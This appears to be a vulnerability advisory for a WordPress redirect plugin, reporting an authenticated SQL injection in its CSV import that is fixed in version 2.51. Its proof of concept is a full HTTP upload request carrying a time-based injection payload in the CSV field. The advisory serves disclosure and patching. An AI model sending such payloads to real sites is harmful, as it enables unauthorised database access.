301 Redirects - Easy Redirect Manager < 2.51 - Authenticated SQL Injection
Description
The plugin does not sanitise its "Redirect From" column when importing a CSV file, allowing high privilege users to perform SQL injections. The PoC video provided mentioned 2.53 as vulnerable, however v2.45 was installed and used. The issue has been verified to have been fixed in 2.51
Proof of Concept
POST /wp-admin/options-general.php?page=eps_redirects&tab=import-export HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://example.com/wp-admin/options-general.php?page=eps_redirects&tab=import-export Content-Type: multipart/form-data; boundary=---------------------------28588551781499779692758371208 Content-Length: 682 Connection: close Cookie: [Admin cookies] Upgrade-Insecure-Requests: 1 -----------------------------28588551781499779692758371208 Content-Disposition: form-data; name="eps_redirect_nonce_submit" 283965d8a1 -----------------------------28588551781499779692758371208 Content-Disposition: form-data; name="eps_redirect_upload_file"; filename="2021-01-19-redirects.csv" Content-Type: text/csv 301,' or sleep(2)#,/yolo,0 -----------------------------28588551781499779692758371208 Content-Disposition: form-data; name="eps_redirect_upload" Upload CSV -----------------------------28588551781499779692758371208 Content-Disposition: form-data; name="eps_redirect_upload_method" skip -----------------------------28588551781499779692758371208--
Affects Plugins
Fixed in version 2.51✓
Classification
Miscellaneous
Original Researcher
Nguyen Van Khanh - SunCSR (Sun* Cyber Security Research)
Submitter
khanh
Submitter website
Verified
Yes
Timeline
Publicly Published
2021-01-18 (about 3 months ago)
Added
2021-01-19 (about 3 months ago)
Last Updated
2021-01-21 (about 3 months ago)